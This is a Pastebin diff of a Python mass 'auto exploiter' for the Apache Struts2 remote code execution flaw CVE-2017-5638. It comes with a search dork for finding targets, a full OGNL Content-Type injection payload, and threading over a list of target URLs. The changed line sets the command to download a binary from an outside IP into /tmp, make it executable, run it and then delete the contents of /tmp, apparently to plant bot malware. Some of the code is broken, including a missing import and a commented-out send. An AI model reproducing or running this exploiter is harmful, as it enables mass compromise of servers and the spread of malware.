API tools faq
paste
View difference between Paste ID: xNsQawJK and GEhHhaX4
SHOW: | | - or go back to the newest paste.
1
#!/usr/bin/python
2
# Modded Apache Struts2 RCE Exploit v2 CVE-2017-5638 AUTO EXPLOITER | By; LiGhT
3
# Dork: "site:com filetype:action"
4
# site example^: org,net,egu,gov,io,pw
5
6
import urllib2

7
import httplib

8
import sys, re, os

9
from threading import Thread 

10
11
strutz = open(sys.argv[1], "r").readlines()

12-
cmd = "" # COMMAND HERE Arch(s): x86, i686

12+
cmd = "cd /tmp ; wget http://1.1.1.1/kys7t ; chmod 777 kys7t ; ./kys7t ; rm -rf /tmp/*" # COMMAND HERE Arch(s): x86, i686

13
14
def exploit(url, cmd):

15
	#page = ''

16
	payload = "%{(#_='multipart/form-data')."

17
	payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."

18
	payload += "(#_memberAccess?"

19
	payload += "(#_memberAccess=#dm):"

20
	payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."

21
	payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."

22
	payload += "(#ognlUtil.getExcludedPackageNames().clear())."

23
	payload += "(#ognlUtil.getExcludedClasses().clear())."

24
	payload += "(#context.setMemberAccess(#dm))))."

25
	payload += "(#cmd='%s')." % cmd

26
	payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."

27
	payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."

28
	payload += "(#p=new java.lang.ProcessBuilder(#cmds))."

29
	payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."

30
	payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."

31
	payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."

32
	payload += "(#ros.flush())}"

33
	try:

34
		url = ''.join(url)

35
		if "http://" not in url:

36
			url = "http://"+url

37
		elif "https://" in url:

38
			url = url.replace("https://", "http://")

39
	   	headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}

40
	   	request = urllib2.Request(url, headers=headers)

41
		print "\033[32mPayload Sent!"

42
	   	#page = urllib2.urlopen(request).read()

43
	except httplib.IncompleteRead, e:

44
		pass

45
	except KeyboardInterrupt:

46
		pass

47
	except Exception:

48
		pass

49
	#print "\n\033[35m%s"%(page)

50
 

51
 

52
for url in strutz:

53
	try:

54
		l33t = Thread(target=exploit, args=(url,cmd,))

55
		l33t.start()

56
		time.sleep(0.09)

57
	except:

58
		pass
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!